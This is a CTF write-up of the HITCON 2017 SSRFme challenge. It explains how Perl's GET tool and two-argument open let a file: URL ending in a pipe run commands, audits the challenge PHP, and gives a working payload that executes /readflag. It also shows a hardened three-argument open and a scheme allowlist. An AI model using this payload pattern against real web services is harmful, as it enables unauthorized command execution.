[BUUCTF][HITCON 2017]SSRFme

Knowledge points

Perl script GET open command vulnerability

GET is a command-line tool that ships with LWP (Library for WWW in Perl). Its purpose is to simulate HTTP GET requests. Under the hood, GET hands the request to Perl's open.

Perl's open can execute commands, and GET also supports the file: scheme.
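The open behaviour described above, shown as an added example that is not code from the original post or from LWP itself. The function names read_two_arg, read_three_arg and is_http_url are hypothetical, and the inputs are constructed, using a harmless echo command:

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Weak form: with two arguments Perl reads the open mode out of the string
# itself, so a trailing "|" means "run this as a command and read its output".
sub read_two_arg {
    my ($path) = @_;
    open(my $fh, $path) or return "open failed: $!\n";
    local $/;                      # slurp the whole stream
    my $data = <$fh>;
    close($fh);
    return defined $data ? $data : '';
}

# Hardened form: the mode is its own argument, so $path is only ever treated
# as a file name, whatever characters it contains.
sub read_three_arg {
    my ($path) = @_;
    open(my $fh, '<', $path) or return "open failed: $!\n";
    local $/;
    my $data = <$fh>;
    close($fh);
    return defined $data ? $data : '';
}

# Caller-side check for a fetch endpoint (hypothetical helper): accept only
# http:// and https:// URLs, so file: never reaches the fetcher at all.
sub is_http_url {
    my ($url) = @_;
    return $url =~ m{\Ahttps?://[^\s/]+}i ? 1 : 0;
}

# Constructed input: a "path" ending in a pipe, with a harmless command.
my $untrusted = 'echo ran-as-command |';

print "two-arg:   ", read_two_arg($untrusted);
print "three-arg: ", read_three_arg($untrusted);

# Constructed URLs for the scheme check.
for my $url ('http://example.com/', 'file:/etc/hostname', "file:$untrusted") {
    printf "%-32s %s\n", $url, is_http_url($url) ? 'allowed' : 'rejected';
}
```

escapeshellarg in the PHP code only protects the shell that launches GET; the string still reaches Perl unchanged, so the fix belongs in the open call or in a scheme allowlist before the fetch.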

Newly learned function

pathinfo

Code audit

The first part of the code prints my IP, and the sandbox directory is named after the MD5 hash of "orange" concatenated with that IP. The content entered through the url parameter is passed to the GET command, and the output of that command is stored in a file named after the value of the filename parameter.

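<?php
    // The first X-Forwarded-For entry (client-controlled) overrides REMOTE_ADDR.
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        $_SERVER['REMOTE_ADDR'] = $http_x_headers[0];
    }

    echo $_SERVER["REMOTE_ADDR"];

    // Per-client sandbox directory: md5("orange" . IP).
    $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
    @mkdir($sandbox);
    @chdir($sandbox);

    // Fetch the url parameter with Perl's GET tool. escapeshellarg() quotes it
    // for the shell, but the value still reaches GET unchanged.
    $data = shell_exec("GET " . escapeshellarg($_GET["url"]));

    // Directory and file name are derived from the filename parameter.
    $info = pathinfo($_GET["filename"]);
    $dir  = str_replace(".", "", basename($info["dirname"]));
    @mkdir($dir);
    @chdir($dir);
    @file_put_contents(basename($info["basename"]), $data);
    highlight_file(__FILE__);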

Try to read the root directory and create a file named abc. I see that readflag should be used to read the flag, so I construct the payload ?url=file:bash -c /readflag|&filename=123

Origin blog.csdn.net/solitudi/article/details/108909609